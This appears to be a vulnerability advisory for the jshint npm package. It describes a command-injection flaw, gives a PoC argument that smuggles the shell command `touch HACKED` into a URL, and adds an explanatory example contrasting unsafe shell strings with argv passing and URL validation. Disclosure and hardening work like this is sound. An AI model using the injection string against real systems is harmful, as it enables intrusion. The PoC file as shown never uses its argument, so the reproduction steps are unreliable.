jshint

vulnerability: remote code execution
severity: 3.8
language: javascript
registry: npm

Description

The jshint package is vulnerable to remote code execution (RCE): user-supplied arguments are unsafely formatted into a command string and executed, leading to arbitrary command injection.

POC

  1. Create the following PoC file:
// poc.js
var jshint = require("jshint/bin/apply");

  2. Check that no file named HACKED exists in the current directory.
  3. Execute the following command in another terminal:
node poc.js 'https://eee.w.www.ww"; touch HACKED; #' #  Run the PoC ... you'll need to CTRL+C after some seconds
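The pattern behind this report next to a hardened form, as an added example that is not jshint's code. The function names and the `some-tool` command are hypothetical, and the input is the argument from the PoC above; the unsafe command line is only built as a string, never executed.

```javascript
// Added example: hypothetical helper names, not jshint's own code.
const { execFileSync } = require("child_process");

// Constructed input: the argument used in the PoC above.
const POC_ARG = 'https://eee.w.www.ww"; touch HACKED; #';

// Vulnerable pattern (built only, never executed here): the value is pasted
// into a shell command line, so its `"` closes the quoting and `;` starts a
// new command. "some-tool" is a placeholder command name.
function unsafeCommandLine(url) {
  return 'some-tool "' + url + '"';
}

// Hardened pattern: no shell is involved. execFileSync hands each array
// element to the child as one argv entry, so metacharacters stay data.
// The child here is Node itself, echoing back the argument it received.
function echoViaArgv(url) {
  return execFileSync(
    process.execPath,
    ["-e", "process.stdout.write(process.argv[1])", url],
    { encoding: "utf8" }
  );
}

// Defence in depth: accept only a well-formed https URL before using it.
function parseHttpsUrl(input) {
  let u;
  try {
    u = new URL(input);
  } catch {
    return null; // not parseable as a URL at all
  }
  if (u.protocol !== "https:") return null;
  if (!/^[a-z0-9.-]+$/i.test(u.hostname)) return null;
  return u;
}

console.log("shell would see :", unsafeCommandLine(POC_ARG));
console.log("argv round-trip :", echoViaArgv(POC_ARG) === POC_ARG);
console.log("validator result:", parseHttpsUrl(POC_ARG));
```
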

References